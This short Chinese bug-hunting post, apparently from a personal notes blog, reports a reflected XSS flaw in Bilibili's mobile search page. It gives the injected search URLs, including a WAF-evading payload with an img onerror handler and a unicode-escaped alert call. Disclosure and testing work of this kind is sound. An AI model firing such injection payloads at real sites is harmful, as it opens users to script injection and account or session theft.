@1kbfree
2018-08-08T20:18:32.000000Z
字数 372
阅读 1152
搜索处存在xss
漏洞挖掘
1、打开Url:https://m.bilibili.com/search.html?keyword=123
2、然后经过n个小时的观摩(看源代码),可以这样子,访问 https://m.bilibili.com/search.html?keyword=123"><a href="http://www.baidu.com">2333</a><!--
可以看到,这里已经解析了html代码,然后我们来弹窗试试,经历了n个小时,n个方法,终于有一个绕过了(你们的waf太恶心了,实在是绕的我头皮发麻),如下
https://m.bilibili.com/search.html?keyword="> <img src="x:gif" onerror="window['al\u0065rt']('终于有xss了')"></img> <!--
